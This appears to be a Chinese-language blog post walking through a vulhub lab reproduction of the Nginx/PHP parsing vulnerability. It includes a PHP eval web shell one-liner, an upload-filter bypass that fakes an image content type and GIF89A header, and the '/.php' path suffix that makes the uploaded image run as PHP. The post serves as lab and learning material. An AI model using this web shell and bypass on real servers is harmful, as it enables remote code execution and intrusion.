Nginx 背锅解析漏洞

Nginx 背锅解析漏洞

1 在线漏洞解读:

https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/

在这里插入图片描述

2 环境搭建

cd  /home/kali/vulhub/nginx/nginx_parsing_vulnerability

在这里插入图片描述

启动:

sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a

已启动:访问端口18080

在这里插入图片描述

3 影响版本:

​ 版本信息:

  • Nginx 1.x 最新版
  • PHP 7.x最新版

4 漏洞复现

4.1 访问页面

​ 访问页面http://192.168.225.166:18080/

在这里插入图片描述

4.2 上传文件
<?php @eval($_REQUEST[777]);phpinfo();?>  # 1.php文件内容

在这里插入图片描述

4.3 上传失败

在这里插入图片描述

4.4 使用bp进行分析包

使用bp修改请求参数后缀和内容类型,和内容头类型,发现上传成功,返回上传文件位置

Content-Type: image/png

GIF89A

在这里插入图片描述

4.5 对返回图片位置进行访问
192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png

在这里插入图片描述

4.6 执行php代码技巧-图片后缀加./php
http://192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php

在这里插入图片描述

4.7 分析原因 --》cgi.fix_pathinfo–》on开启后会将png图当成php脚本执行

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_42786460/article/details/133268857